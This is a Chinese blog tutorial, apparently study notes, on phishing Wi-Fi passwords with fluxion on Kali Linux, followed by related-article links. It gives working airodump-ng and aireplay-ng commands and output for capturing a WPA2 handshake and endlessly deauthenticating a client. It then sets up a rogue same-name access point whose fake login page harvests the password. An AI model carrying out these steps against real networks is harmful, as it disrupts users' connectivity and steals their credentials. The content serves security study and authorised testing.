kali利用fluxion无线网络钓鱼
kali利用fluxion无线网络钓鱼
看了网上所有关于fluxion的钓鱼使用教程都感觉不太全,本文本是整理为了自己复习学习,初学有问题还请大佬指示。
- 测试硬件:
笔记本电脑
无限外置网卡一张
(两张网卡是必须的)
- 软件:
fluxion
airmon
- 查看网卡
airmon-ng
- 选择网卡
我用的是wlan0(wlan0为电脑自带网卡)
- 启动网卡监听
airmon-ng start wlan0
- 查看网卡监听信息
airodump-ng wlan0mon
- 选择网络信息
(图片不是本次抓包的截图)
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E0:40:07:09:50:A8 -1 0 0 0 1 -1 <length: 0> 50:D2:F5:FE:FA:B1 -125 11 0 0 5 130 WPA2 CCMP PSK Xiaomi_FAB0 F6:D5:55:4E:09:6B -58 9 12 0 3 360 WPA2 CCMP PSK OnePlus 7 pro
- 获取握手包
airodump-ng -c (信道CH) --bssid (bssid) -w /root(握手包存放目录) wlan0mon
参数:
-c 指定频道号
--bssid 指定路由器bssid
-w 指定抓取的握手包存储路径
最后是指定网卡接口
CH 3 ][ Elapsed: 2 mins ][ 2020-09-08 00:54 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F6:D5:55:4E:09:6B -3 100 841 2360 5 3 360 WPA2 CCMP PSK OPPO K5 BSSID STATION PWR Rate Lost Frames Notes Probes F6:D5:55:4E:09:6B 26:84:7E:83:93:77 -29 0e- 1e 0 16562 EAPOL OPPO K5 F6:D5:55:4E:09:6B 4C:32:75:94:C5:15 -53 0e-24e 1616 572
- 开始攻击来获取握手报
新打开一个Shell ,之前的不要关。
aireplay-ng -0 0(攻击次数 0为无限次) -a BSSID -c (使用设备MAC地址 STATION ) wlan0mon
参数解释:
-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)
-a 指定无线路由器BSSID
-c 指定强制断开的设备
最后是指定网卡接口
root@yuan:~# aireplay-ng -0 0 -a 50:D2:F5:FE:FA:B1 -c 38:6E:A2:5C:04:EC wlan0mon
00:15:28 Waiting for beacon frame (BSSID: 50:D2:F5:FE:FA:B1) on channel 5
00:15:29 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|65 ACKs]
00:15:29 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|63 ACKs]
00:15:30 Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [ 5|61 ACKs]
等待[ WPA handshake: F6:D5:55:4E:09:6B 出现证明握手包获取完成
在保存目录里.cap结尾的为握手包
- 找到fluxion目录
./fluxion.sh
- 运行fluxion
- 选择中文
(有人说中文有bug,如果英语好可以选择英语)
- 选择建立 AP (建立一个同名网络)
- 选择你想要搜索网络的网卡
- 选择信道(我一般都是所有信道)
- 扫描到你之前抓包的网络后按Ctrl+C结束扫描,填网络对应的序号回车
- 选择干扰你要钓鱼网站的网卡
- 接着无脑选择
- 选择3 流氓AP - hostapd
到这里最开始抓到握手包的用处来了
把你刚才抓到的握手包后缀为.cap的文件目录填上(直接拖拽最快)
回车
- 选择cowpatty验证
- 选择创建SSL证书
- 选择断开原网络
- 选择自己制作的钓鱼页面
出现这个页面证明钓鱼WIFI开始工作了,扫描WIFI原网络已经无法连接了只能自动连接我们自己伪造的同名AP
手机连接成功后自动弹窗输入密码后进行验证,右上角的框会有提示,生成一个文件里边有密码和网络信息
- 最后成果
本次测试钓鱼网络均为自己的网络,本文章仅供学习使用。
kali利用fluxion无线网络钓鱼相关推荐
- 第一次利用 kali linux 破解无线网络
最近很慌,不能去学校上课,得用学习通上网课.虽然线下线上对一名大学生来说都无所谓,但是流量哇啦啦的用的有点心疼.于是就想到了隔壁老王家的WiFi. 逛了几天CSDN论坛,觉得理论知识勉强够了,加上,某 ...
- kali linux 设置无线网络连接,KaliLinux无线网络设置[bak]
本文最后更新于2014年7月1日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢! 在使用网络查看命令(ifconfig/iwconfig)可以查看到无线网卡的情况下(表明无线网卡的驱动 ...
- 【Kali安全渗透测试实践教程】第9章 无线网络渗透
第9章 无线网络渗透 9.1 无线网络安全基础 1.无线网络的接入方式 2.无线网络的安全问题 3.WLAN的体系结构 (1)基础结构网络 (2)自组织网络 4.WLAN的安全问题 (1)常规安全威胁 ...
- 网络类型_多种类型的网络钓鱼攻击和诈骗
点击标题下「蓝色微信名」可快速关注 网络钓鱼攻击每年都会对企业造成重大损失和损害 谷歌和Facebook的损失总计超过1亿美元.比利时克里兰银行向网络犯罪分子交付了超过7500万美元.奥地利航空零部件 ...
- 毕业论文开题报告 - 基于Linux的无线网络渗透测试研究
目录 开题报告填写要求 1.毕业论文综述(题目背景.研究意义及国内外相关研究情况) 1.1 题目背景 1.2研究意义 1.3现阶段相关研究情况 2.本课题研究的主要内容和拟采用的研究方案.研究方法或措 ...
- AI+网络安全 让鱼叉式网络钓鱼攻击无所遁形
2017年是网络攻击极其活跃的一年,全球先后发生了多起大型网络攻击事件,例如令人震惊的Wanna Cry勒索病毒席卷全球,包括中国在内的150多个国家受到网络攻击.各国企业.学校.医院等机构无一幸免, ...
- 《Kali Linux高级渗透测试原书第2版》网络渗透测试技术书 无线网络渗透测试详解 黑客攻击与防范实战从入门到精通书
内容简介: KaliLinux面向专业的渗透测试和审计,集成了大量挑选的检测工具.本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者"杀链"采取的具体 ...
- kali liunx使用心得之命令行模式下如何配置连接无线网络
kali liunx使用心得之命令行模式下如何配置连接无线网络 最近在使用kali时出现了一点小小的问题,由于我安装的是win10和kali双系统,为了能够在kali界面下自由操作win10下的磁盘, ...
- Kali linux无线网络渗透详解笔记
Kali linux无线网络渗透详解笔记 第一章:搭建渗透环境测试环境 第二章:WiFi网络的构成 第三章:监听WiFi网络 第四章:捕获数据包 第五章: 分析数据包 第六章:获取信息 第七章:WPS ...
- kali linux网络扫描~无线网络扫描
理论知识 无线网络是一种特殊的局域网,也就是人们常说的Wi-Fi网络,由于它采用无线方式传输数据,所以采用方式也不同 无线网络是采用无线通信技术实现的网络 无线网络既包括允许用户建立远距离无线连接的全 ...
最新文章
- ECCV2018目标检测(object detection)算法总览
- python的下载和安装步骤-下载及安装Python详细步骤
- 数据结构-----AVL树的插入删除操作
- AHS of FCGRC 停课 Day 4
- linux:fdisk分区命令详解
- SparkStreaming读取本地文件进行wordCount
- laravel 核心类Kernel
- 「中间件」消息中间件如何实现每秒几十万的高并发写入?
- java从入门到放弃(一)
- python数字雨代码_电影黑客帝国中代码雨如何实现?简单!用 Python 就能实现!...
- 单片机入门必备知识,c语言基础来了
- 安装打印机时出现无法安装,打印处理器不存在
- 库存流水账计算结余数量
- python用电度数设计_用Python实现一个爬取XX大学电费通知的小脚本
- Webdriver - webdriver hangs when get or click
- 强化学习:Actor-Critic、SPG、DDPG、MADDPG
- Java编写个人所得税计算机的问题
- 计算机毕业设计之家庭理财管理系统的设计与实现
- some以及every的区别
- App 打包提交APP Store途中遇到蛋疼的ERROR ITMS-90035